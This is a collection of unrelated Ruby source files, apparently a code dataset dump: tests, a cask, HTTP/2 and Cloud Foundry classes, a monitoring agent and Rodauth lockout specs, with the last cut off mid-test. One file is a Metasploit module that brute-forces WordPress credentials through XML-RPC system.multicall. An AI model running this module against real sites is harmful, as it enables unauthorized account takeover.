before do
user.update(user_type: 'project_bot')
end
it_behaves_like 'does not require password to be present'
end
end
describe '#migration_bot' do
it 'creates the user if it does not exist' do
expect do
described_class.migration_bot
end.to change { User.where(user_type: :migration_bot).count }.by(1)
end
it 'does not create a new user if it already exists' do
described_class.migration_bot
expect do
described_class.migration_bot
end.not_to change { User.count }
end
end
end
| 31.881601 | 430 | 0.657931 |
1cbb0c8e4b1ede90c589332ca5d7cf09c9d2bc87 | 716 | require 'minitest/spec'
describe_recipe 'apache2::uninstall' do
include MiniTest::Chef::Resources
include MiniTest::Chef::Assertions
it 'should stop apache2' do
case node[:platform_family]
when 'debian'
service('apache2').wont_be_running
when 'rhel'
service('httpd').wont_be_running
else
# Fail test if we don't have a supported OS.
      flunk('Platform family not supported by this test')
end
end
it 'should remove the apache2 package' do
case node[:platform_family]
when 'debian'
package('apache2').wont_be_installed
when 'rhel'
package('httpd').wont_be_installed
else
# Fail test if we don't have a supported OS.
      flunk('Platform family not supported by this test')
end
end
end
| 23.096774 | 50 | 0.670391 |
089f6f49daabb91cad9474053fa0ce9e9024d325 | 7,466 | require 'spec_helper'
describe RSpec::Apib::Recorder do
def stub_request(env = {})
ip_app = ActionDispatch::RemoteIp.new(Proc.new {})
ip_app.call(env)
ActionDispatch::Request.new(env)
end
let(:example) do
double(
metadata: {
example_group: {}
},
description: 'foo example'
)
end
let(:response) do
double(
status: 200,
content_type: 'application/json',
body: '{}',
headers: {}
)
end
let(:routes) { ActionDispatch::Routing::RouteSet.new }
let(:mapper) { ActionDispatch::Routing::Mapper.new routes }
let(:doc) { {} }
let(:request) do
request = stub_request(
"SCRIPT_NAME" => "",
"PATH_INFO" => "/foo/5",
"REQUEST_METHOD" => "GET",
"HTTP_ORIGIN" => "foobar",
"rack.input" => StringIO.new('{}')
)
end
subject { described_class.new(example, request, response, routes, doc) }
before :each do
routes.draw do
get '/foo/:id' => 'foo#bar'
end
end
it { should respond_to :run }
describe '#run' do
before :each do
allow(subject).to receive(:document_request)
allow(subject).to receive(:document_response)
end
context 'when request is nil' do
let(:request) { nil }
let(:response) { true }
it 'is not calling #document_request' do
expect(subject).to_not receive(:document_request)
subject.run
end
it 'is not calling #document_response' do
expect(subject).to_not receive(:document_response)
subject.run
end
end
context 'when response is nil' do
let(:request) { true }
let(:response) { nil }
it 'is not calling #document_request' do
expect(subject).to_not receive(:document_request)
subject.run
end
it 'is not calling #document_response' do
expect(subject).to_not receive(:document_response)
subject.run
end
end
it 'calls #document_request' do
expect(subject).to receive(:document_request)
subject.run
end
it 'calls #document_response' do
expect(subject).to receive(:document_response)
subject.run
end
end
pending '#initialize'
pending '#request_header_blacklist'
pending '#request_param_blacklist'
pending '#route'
pending '#example_group'
describe '#path' do
it 'highlights required parts' do
mapper.get "/foo/:id", to: "foo#bar", as: "baz"
expect(subject.send(:path)).to eql '/foo/{id}(.{format})'
end
it 'highlights optional parts' do
mapper.get "/foo/(:id)", to: "foo#bar", as: "baz"
expect(subject.send(:path)).to eql '/foo(/{id})(.{format})'
end
end
pending '#group'
pending '#resource_type'
pending '#resource_name'
pending '#action'
pending '#document_request'
pending '#document_request_header'
describe '#document_request_header' do
it 'records headers' do
action = subject.tap { |s| s.run }.send(:action)
expect(action[:request][:headers]['origin']).to eql 'foobar'
end
it 'is not recording empty headers' do
request = stub_request(
"SCRIPT_NAME" => "",
"PATH_INFO" => "/foo/5",
"REQUEST_METHOD" => "GET",
"HTTP_ORIGIN" => "",
"rack.input" => StringIO.new('{}')
)
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
expect(action[:request][:headers]).to_not have_key 'origin'
end
end
describe '#document_extended_description' do
context 'only response description is included' do
# --- apib:response
# This is a comment used as description.
# ---
it 'replaces the description with the comment above the example' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql 'This is a comment used as description.'
end
# --- apib:response
# foo
# bar
# ---
it 'handles multi line comments' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar"
end
# ABC
#
# --- apib:response
# foo
# bar
# ---
#
# CDE
#
it 'ignores surrounding comments' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar"
end
# ABC
#
# --- apib:response
# foo
# bar
#
# CDE
#
it 'works without ending string' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foo\nbar\n\nCDE\n"
end
# --- apib:response
# ### foo
it 'is not stripping out markdown control characters' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "### foo"
end
# --- apib:response
# foobar
# ------
# hello
      it 'accepts headline underscores' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "foobar\n------\nhello"
end
# --- apib:response
# + foobar
# + hello
it 'keeps subsequent indentation' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
data = action[:response].first
expect(data[:description]).to eql "+ foobar\n + hello"
end
end
context 'both request and response have description' do
# --- apib:request
# Request comment
# --- apib:response
# Response comment
# ---
it 'saves request description if we have a request and response description' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
request_data = action[:request]
response_data = action[:response].first
expect(response_data[:description]).to eql 'Response comment'
expect(request_data[:description]).to eql 'Request comment'
end
# --- apib:request
# Request comment
# ---
it 'saves request description if we have only a request description' do |example|
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
request_data = action[:request]
expect(request_data[:description]).to eql 'Request comment'
end
end
end
pending '#document_response'
pending '#response_exists?'
end
| 28.826255 | 95 | 0.600188 |
d519fbdca25fa4efecce31536bd8b0b83bdf4f38 | 5,347 | # frozen_string_literal: true
#
# Copyright, 2018, by Samuel G. D. Williams. <http://www.codeotaku.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require_relative '../request'
require_relative 'stream'
module Async
module HTTP
module Protocol
module HTTP2
# Typically used on the server side to represent an incoming request, and write the response.
class Request < Protocol::Request
class Stream < HTTP2::Stream
def initialize(*)
super
@enqueued = false
@request = Request.new(self)
end
attr :request
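						# Illustrative sketch: HTTP/2 request headers arrive as [name, value]
						# pairs, e.g.
						#   [[':scheme', 'https'], [':method', 'GET'], [':path', '/'], ['accept', 'text/html']]
						# The pseudo-headers populate the request's scheme/method/path/etc. below;
						# everything else is added as an ordinary header.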
def receive_initial_headers(headers, end_stream)
headers.each do |key, value|
if key == SCHEME
raise ::Protocol::HTTP2::HeaderError, "Request scheme already specified!" if @request.scheme
@request.scheme = value
elsif key == AUTHORITY
raise ::Protocol::HTTP2::HeaderError, "Request authority already specified!" if @request.authority
@request.authority = value
elsif key == METHOD
raise ::Protocol::HTTP2::HeaderError, "Request method already specified!" if @request.method
@request.method = value
elsif key == PATH
raise ::Protocol::HTTP2::HeaderError, "Request path is empty!" if value.empty?
raise ::Protocol::HTTP2::HeaderError, "Request path already specified!" if @request.path
@request.path = value
elsif key == PROTOCOL
raise ::Protocol::HTTP2::HeaderError, "Request protocol already specified!" if @request.protocol
@request.protocol = value
elsif key == CONTENT_LENGTH
raise ::Protocol::HTTP2::HeaderError, "Request content length already specified!" if @length
@length = Integer(value)
elsif key == CONNECTION
raise ::Protocol::HTTP2::HeaderError, "Connection header is not allowed!"
elsif key.start_with? ':'
raise ::Protocol::HTTP2::HeaderError, "Invalid pseudo-header #{key}!"
elsif key =~ /[A-Z]/
raise ::Protocol::HTTP2::HeaderError, "Invalid characters in header #{key}!"
else
add_header(key, value)
end
end
@request.headers = @headers
unless @request.valid?
raise ::Protocol::HTTP2::HeaderError, "Request is missing required headers!"
else
# We only construct the input/body if data is coming.
unless end_stream
@request.body = prepare_input(@length)
end
# We are ready for processing:
@connection.requests.enqueue(@request)
end
return headers
end
def closed(error)
@request = nil
super
end
end
def initialize(stream)
super(nil, nil, nil, nil, VERSION, nil)
@stream = stream
end
attr :stream
def connection
@stream.connection
end
def valid?
@scheme and @method and @path
end
def hijack?
false
end
NO_RESPONSE = [
[STATUS, '500'],
]
def send_response(response)
if response.nil?
return @stream.send_headers(nil, NO_RESPONSE, ::Protocol::HTTP2::END_STREAM)
end
protocol_headers = [
[STATUS, response.status],
]
if protocol = response.protocol
protocol_headers << [PROTOCOL, protocol]
end
if length = response.body&.length
protocol_headers << [CONTENT_LENGTH, length]
end
headers = ::Protocol::HTTP::Headers::Merged.new(protocol_headers, response.headers)
if body = response.body and !self.head?
# This function informs the headers object that any subsequent headers are going to be trailer. Therefore, it must be called *before* sending the headers, to avoid any race conditions.
trailer = response.headers.trailer!
@stream.send_headers(nil, headers)
@stream.send_body(body, trailer)
else
# Ensure the response body is closed if we are ending the stream:
response.close
@stream.send_headers(nil, headers, ::Protocol::HTTP2::END_STREAM)
end
end
end
end
end
end
end
| 32.210843 | 191 | 0.634935 |
e2accb7b8723cb94060de1c138fc8b3d72eaee49 | 1,323 | module VCAP::CloudController
module Diego
class Environment
EXCLUDE = [:users]
def initialize(app, initial_env={})
@app = app
@initial_env = initial_env || {}
end
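      # Illustrative shape of the result (values here are made up): an array of
      # single-entry hashes such as
      #   [{ 'name' => 'VCAP_APPLICATION', 'value' => '{"limits":...}' },
      #    { 'name' => 'MEMORY_LIMIT',     'value' => '512m' }]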
def as_json(_={})
env = []
add_hash_to_env(@initial_env, env)
env << { 'name' => 'VCAP_APPLICATION', 'value' => vcap_application.to_json }
env << { 'name' => 'VCAP_SERVICES', 'value' => app.system_env_json['VCAP_SERVICES'].to_json }
env << { 'name' => 'MEMORY_LIMIT', 'value' => "#{app.memory}m" }
db_uri = app.database_uri
env << { 'name' => 'DATABASE_URL', 'value' => db_uri } if db_uri
app_env_json = app.environment_json || {}
add_hash_to_env(app_env_json, env)
env
end
private
attr_reader :app
def vcap_application
env = app.vcap_application
EXCLUDE.each { |k| env.delete(k) }
env
end
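      # For example (illustrative input):
      #   hash_to_diego_env('FOO' => 'bar', 'OPTS' => { 'a' => 1 })
      #   # => [{ 'name' => 'FOO',  'value' => 'bar' },
      #   #     { 'name' => 'OPTS', 'value' => '{"a":1}' }]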
def self.hash_to_diego_env(hash)
hash.map do |k, v|
case v
when Array, Hash
v = MultiJson.dump(v)
else
v = v.to_s
end
{ 'name' => k, 'value' => v }
end
end
def add_hash_to_env(hash, env)
env.concat(self.class.hash_to_diego_env(hash))
end
end
end
end
| 23.210526 | 101 | 0.534392 |
1155906e6e919798fe9c8b672c523da340a99035 | 1,022 | cask 'expressionist' do
version :latest
sha256 :no_check
# aescripts.com was verified as official when first introduced to the cask
url 'https://aescripts.com/downloadable/download/sample/sample_id/411',
user_agent: :fake
name 'Expressionist'
homepage "http://klustre.nl/#{token}"
depends_on cask: 'exmancmd'
postflight do
zxp = Dir["#{staged_path}/expressionist*/Expressionist*.zxp"][0]
system_command "#{HOMEBREW_PREFIX}/bin/exmancmd", args: ['--install', zxp]
end
uninstall script: {
executable: "#{HOMEBREW_PREFIX}/bin/exmancmd",
args: ['--remove', 'com.aescripts.expressionist'],
}
support = '~/Library/Application Support/Aescripts'
zap trash: [
"#{support}/settings/com.aescripts.settings_Expressionist.json",
"#{support}/com.aescripts.Expressionist.lic",
],
rmdir: support
caveats "A license can be purchased at https://aescripts.com/#{token}."
end
| 31.9375 | 79 | 0.636986 |
d52bc38f9fdc66e94a4f976f82c7da6f7a1cb5ed | 1,370 | require_relative 'helper'
require 'zendesk/deployment/committish'
describe Zendesk::Deployment::Committish do
def tag(thing, tag)
sh "git checkout #{thing} 2>&1 && git tag #{tag} 2>&1 && git checkout master 2>&1"
end
def sh(command)
result = `#{command}`
raise "Failed: #{result}" unless $?.success?
result
end
def commit(thing)
Zendesk::Deployment::Committish.new(thing)
end
around do |test|
Dir.mktmpdir do |dir|
Dir.chdir(dir) do
sh "git init 2>&1 && git commit -m 'a' --allow-empty 2>&1 && git commit -m 'a' --allow-empty 2>&1"
test.call
end
end
end
it "finds tag" do
tag "HEAD^", "v1.2.3"
commit = commit("v1.2.3")
assert commit.valid_tag?
assert_equal "v1.2.3", commit.to_s
end
it "finds pre" do
tag "HEAD^", "v1.2.3.4"
commit = commit("v1.2.3.4")
assert commit.valid_tag?
assert_equal "v1.2.3.4", commit.to_s
end
it "finds pre with letters" do
tag "HEAD^", "v1.2.3.patched"
commit = commit("v1.2.3.patched")
assert commit.valid_tag?
assert_equal "v1.2.3.patched", commit.to_s
end
it "can compare tags" do
tag "HEAD^", "v1.2.3"
tag "HEAD", "v1.2.4"
assert_operator commit("v1.2.4"), :>, commit("v1.2.3")
end
it "works with non-tags" do
assert_equal 0, commit("v1.2.4") <=> commit("master")
end
end
| 23.220339 | 107 | 0.607299 |
e9bf7853b4d0733e030cb26d856d1b62e015b49a | 154 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Rtld::Application
| 30.8 | 67 | 0.766234 |
e2395c0fabaa6768487364e035c05aac901f5d2d | 2,051 | # frozen_string_literal: true
ENV['HATCHET_BUILDPACK_BASE'] ||= 'https://github.com/heroku/heroku-buildpack-python.git'
ENV['HATCHET_DEFAULT_STACK'] ||= 'heroku-20'
require 'rspec/core'
require 'hatchet'
LATEST_PYTHON_2_7 = '2.7.18'
LATEST_PYTHON_3_4 = '3.4.10'
LATEST_PYTHON_3_5 = '3.5.10'
LATEST_PYTHON_3_6 = '3.6.15'
LATEST_PYTHON_3_7 = '3.7.12'
LATEST_PYTHON_3_8 = '3.8.12'
LATEST_PYTHON_3_9 = '3.9.7'
LATEST_PYTHON_3_10 = '3.10.0'
LATEST_PYPY_2_7 = '7.3.2'
LATEST_PYPY_3_6 = '7.3.2'
DEFAULT_PYTHON_VERSION = LATEST_PYTHON_3_9
# Work around the return value for `default_buildpack` changing after deploy:
# https://github.com/heroku/hatchet/issues/180
# Once we've updated to Hatchet release that includes the fix, consumers
# of this can switch back to using `app.class.default_buildpack`
DEFAULT_BUILDPACK_URL = Hatchet::App.default_buildpack
RSpec.configure do |config|
# Disables the legacy rspec globals and monkey-patched `should` syntax.
config.disable_monkey_patching!
# Enable flags like --only-failures and --next-failure.
config.example_status_persistence_file_path = '.rspec_status'
# Allows limiting a spec run to individual examples or groups by tagging them
# with `:focus` metadata via the `fit`, `fcontext` and `fdescribe` aliases.
config.filter_run_when_matching :focus
# Allows declaring on which stacks a test/group should run by tagging it with `stacks`.
config.filter_run_excluding stacks: ->(stacks) { !stacks.include?(ENV['HATCHET_DEFAULT_STACK']) }
end
def clean_output(output)
# Remove trailing whitespace characters added by Git:
# https://github.com/heroku/hatchet/issues/162
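  # e.g. (illustrative) clean_output("remote: done        \n") #=> "remote: done\n"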
output.gsub(/ {8}(?=\R)/, '')
end
def update_buildpacks(app, buildpacks)
# Updates the list of buildpacks for an existing app, until Hatchet supports this natively:
# https://github.com/heroku/hatchet/issues/166
buildpack_list = buildpacks.map { |b| { buildpack: (b == :default ? DEFAULT_BUILDPACK_URL : b) } }
app.api_rate_limit.call.buildpack_installation.update(app.name, updates: buildpack_list)
end
| 40.215686 | 100 | 0.761092 |
4abb66098248da536f7e402d45ec0001497e7a0c | 328 | require 'stringio'
require File.expand_path('../../../spec_helper', __FILE__)
ruby_version_is "1.9.2" do
describe "StringIO#set_encoding" do
it "sets the encoding of the underlying String" do
io = StringIO.new
      io.set_encoding Encoding::UTF_8
      io.string.encoding.should == Encoding::UTF_8
end
end
end
| 25.230769 | 58 | 0.695122 |
3901c4b4cec975ff1ee80201fc2dd778e06bd308 | 717 | require "woocommerce_api/resources/legacy/meta"
module WoocommerceAPI
module V3
class Store < Resource
attribute :description
attribute :meta, Meta
attribute :name
attribute :URL
attribute :wc_version
attribute :routes, Hash
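      # The fields below are read from the nested meta object, e.g. (illustrative)
      # `store.currency` returns `store.meta.currency`.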
delegate :timezone,
:currency,
:currency_format,
:currency_position,
:price_num_decimals,
:thousand_separator,
:decimal_separator,
:tax_included,
:weight_unit,
:dimension_unit,
:ssl_enabled,
:permalinks_enabled,
:links,
to: :meta
end
end
end
| 24.724138 | 47 | 0.532775 |
bba4352c5afa77eced16b279c158c726c14222f8 | 2,500 |
# Copyright 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
# The following example requires two environment variables to be set:
# * CRED_PATH - the path to a JSON service_account file
# * PROJECT - the name of your GCP project.
#
# For convenience you optionally can add these to your ~/.bash_profile (or the
# respective .profile settings) environment:
#
# export CRED_PATH=/path/to/my/cred.json
# export PROJECT='my-test-project'
#
# The following command will run this example:
# CRED_PATH=/path/to/my/cred.json \
# PROJECT='my-test-project'
# chef-client -z --runlist \
# "recipe[gcompute::tests~delete_instance_template]"
#
# ________________________
raise "Missing parameter 'CRED_PATH'. Please read docs at #{__FILE__}" \
unless ENV.key?('CRED_PATH')
raise "Missing parameter 'PROJECT'. Please read docs at #{__FILE__}" \
unless ENV.key?('PROJECT')
# For more information on the gauth_credential parameters and providers please
# refer to its detailed documentation at:
# https://github.com/GoogleCloudPlatform/chef-google-auth
gauth_credential 'mycred' do
action :serviceaccount
path ENV['CRED_PATH'] # e.g. '/path/to/my_account.json'
scopes [
'https://www.googleapis.com/auth/compute'
]
end
gcompute_instance_template 'chef-e2e-instance-template-test' do
action :delete
project ENV['PROJECT'] # ex: 'my-test-project'
credential 'mycred'
end
| 36.764706 | 78 | 0.6616 |
7995575b68780f12d38dd99af6e547ac94710378 | 2,795 | #!/usr/bin/env ruby
$stdout.sync = true
# Reports the following MP statistics : user, nice, sys, iowait, irq, soft, steal, idle, intrps
#
# Compatibility
# -------------
# Requires the mpstat command, usually provided by the sysstat package.
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "[email protected]:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# mpstat:
# # The command used to display MP statistics
# command: mpstat
# # Report current usage as the average over this many seconds.
# interval: 5
module MpstatAgent
class Agent < NewRelic::Plugin::Agent::Base
agent_guid "com.railsware.mpstat"
agent_config_options :command, :interval
agent_version '0.0.2'
agent_human_labels("Mpstat") { `hostname -f` }
def poll_cycle
# Using the second reading- avg since previous check
output = stat_output
values,result = parse_values(output), {}
[:usr, :user, :nice, :sys, :iowait, :irq, :soft, :steal, :idle].each do |k|
report_metric("mpstat/#{k}", "%", values[k]) if values[k]
end
report_metric("mpstat/intrps", "instr/sec", values[:intrps]) if values[:intrps]
rescue Exception => e
raise "Couldn't parse output. Make sure you have mpstat installed. #{e}"
end
private
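    # Builds a command such as "mpstat 5 2" (illustrative, using the defaults):
    # two readings, `interval` seconds apart, so the second reading is the
    # average since the first.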
def stat_output()
@command = command || 'mpstat'
@interval = interval || 5
stat_command = "#{command} #{interval} 2"
`#{stat_command}`
end
def parse_values(output)
# Expected output format:
# 04:38:34 PM CPU %user %nice %sys %iowait %irq %soft %steal %idle intr/s
# 04:38:34 PM all 6.69 0.02 1.30 0.31 0.02 0.13 0.00 91.53 349.37
# take the format fields
format=output.split("\n").grep(/CPU/).last.gsub(/\//,'p').gsub(/(%|:|PM|AM)/,'').downcase.split
# take all the stat fields
raw_stats=output.split("\n").grep(/[0-9]+\.[0-9]+$/).last.split
stats={}
format.each_with_index { |field,i| stats[ format[i].to_sym ]=raw_stats[i] }
stats
end
end
NewRelic::Plugin::Setup.install_agent :mpstat, MpstatAgent
#
# Launch the agent (never returns)
#
NewRelic::Plugin::Run.setup_and_run
end
| 28.814433 | 101 | 0.619678 |
d52d6c8f69558ecb1912ac9f31d9bac238330413 | 4,626 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/wordpress_multicall'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress XML-RPC system.multicall Credential Collector',
'Description' => %q{
This module attempts to find Wordpress credentials by abusing the XMLRPC
APIs. Wordpress versions prior to 4.4.1 are suitable for this type of
technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.
},
'Author' =>
[
'KingSabri <King.Sabri[at]gmail.com>' ,
'William <WCoppola[at]Lares.com>',
'sinn3r'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/' ],
['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html' ]
],
'DefaultOptions' =>
{
'USER_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt"),
'PASS_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")
}
))
register_options(
[
OptInt.new('BLOCKEDWAIT', [ true, 'Time(minutes) to wait if got blocked', 6 ]),
OptInt.new('CHUNKSIZE', [ true, 'Number of passwords need to be sent per request. (1700 is the max)', 1500 ]),
], self.class)
    # Not supporting these options, because we are not actually letting the API process the
# password list for us. We are doing that in Metasploit::Framework::LoginScanner::WordpressRPC.
deregister_options(
'BLANK_PASSWORDS', 'PASSWORD', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS'
)
end
def passwords
File.readlines(datastore['PASS_FILE']).lazy.map {|pass| pass.chomp}
end
def check_options
if datastore['CHUNKSIZE'] > 1700
fail_with(Failure::BadConfig, 'Option CHUNKSIZE cannot be larger than 1700')
end
end
def setup
check_options
end
def check_setup
version = wordpress_version
vprint_status("Found Wordpress version: #{version}")
if !wordpress_and_online?
print_error("#{peer}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
false
elsif !wordpress_xmlrpc_enabled?
print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
false
elsif Gem::Version.new(version) >= Gem::Version.new('4.4.1')
print_error("#{peer}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
vprint_status("Dropping CHUNKSIZE from #{datastore['CHUNKSIZE']} to 1")
datastore['CHUNKSIZE'] = 1
true
else
print_status("Target #{peer} is running Wordpress")
true
end
end
def run_host(ip)
if check_setup
print_status("XMLRPC enabled, Hello message received!")
else
print_error("Abborting the attack.")
return
end
print_status("#{peer} - Starting XML-RPC login sweep...")
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: true,
user_file: datastore['USER_FILE'],
username: datastore['USERNAME']
)
scanner = Metasploit::Framework::LoginScanner::WordpressMulticall.new(
configure_http_login_scanner(
passwords: passwords,
chunk_size: datastore['CHUNKSIZE'],
block_wait: datastore['BLOCKEDWAIT'],
base_uri: target_uri.path,
uri: wordpress_url_xmlrpc,
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 5,
)
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: self.fullname,
workspace_id: myworkspace_id
)
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute :level => :vgood, :ip => ip, :msg => "SUCCESSFUL: #{result.credential}"
end
end
end
end
| 33.521739 | 128 | 0.659533 |
e9068968a2e2e176f102bb216e520656992dbdf3 | 233 | class Exam < ApplicationRecord
belongs_to :curriculum
validates :question, presence: true
validates :question_code, presence: true
validates :answer_code, presence: true
validates :explanation, presence: true
end
| 25.888889 | 42 | 0.755365 |
38e34108e7c467e79f2d955e15aff1bdc3501abf | 12,855 | require_relative 'spec_helper'
describe 'Rodauth lockout feature' do
it "should support account lockouts without autologin on unlock" do
lockouts = []
rodauth do
enable :lockout
max_invalid_logins 2
unlock_account_autologin? false
after_account_lockout{lockouts << true}
account_lockouts_email_last_sent_column nil
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
login(:pass=>'012345678910')
page.find('#error_flash').text.must_equal 'There was an error logging in'
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
remove_cookie('rack.session')
visit '/login'
fill_in 'Login', :with=>'[email protected]'
2.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
lockouts.must_equal [true]
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
click_button 'Request Account Unlock'
email_link(/(\/unlock-account\?key=.+)$/).must_equal link
proc{visit '/unlock-account'}.must_raise RuntimeError
visit link[0...-1]
page.find('#error_flash').text.must_equal "There was an error unlocking your account: invalid or expired unlock account key"
visit link
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include('Not Logged')
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
end
it "should support account lockouts with autologin and password required on unlock" do
rodauth do
enable :lockout
unlock_account_requires_password? true
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
100.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
click_button 'Request Account Unlock'
page.find('#notice_flash').text.must_equal 'An email has been sent to you with a link to unlock your account'
link = email_link(/(\/unlock-account\?key=.+)$/)
visit '/login'
fill_in 'Login', :with=>'[email protected]'
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
click_button 'Request Account Unlock'
page.find('#error_flash').text.must_equal "An email has recently been sent to you with a link to unlock the account"
Mail::TestMailer.deliveries.must_equal []
visit link
click_button 'Unlock Account'
page.find('#error_flash').text.must_equal 'There was an error unlocking your account'
page.body.must_include('invalid password')
fill_in 'Password', :with=>'0123456789'
click_button 'Unlock Account'
page.find('#notice_flash').text.must_equal 'Your account has been unlocked'
page.body.must_include("Logged In")
end
it "should autounlock after enough time" do
rodauth do
enable :lockout
max_invalid_logins 2
end
roda do |r|
r.rodauth
r.root{view :content=>(rodauth.logged_in? ? "Logged In" : "Not Logged")}
end
visit '/login'
fill_in 'Login', :with=>'[email protected]'
2.times do
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal 'There was an error logging in'
end
fill_in 'Password', :with=>'012345678910'
click_button 'Login'
page.find('#error_flash').text.must_equal "This account is currently locked out and cannot be logged in to"
page.body.must_include("This account is currently locked out")
DB[:account_lockouts].update(:deadline=>Date.today - 3)
login
page.find('#notice_flash').text.must_equal 'You have been logged in'
page.body.must_include("Logged In")
end
[true, false].each do |before|
it "should clear unlock token when closing account, when loading lockout #{before ? "before" : "after"}" do
rodauth do
features = [:close_account, :lockout]
features.reverse! if before
enable(*features)
max_invalid_logins 2
end
roda do |r|
r.get('b') do
session[:account_id] = DB[:accounts].get(:id)
'b'
end
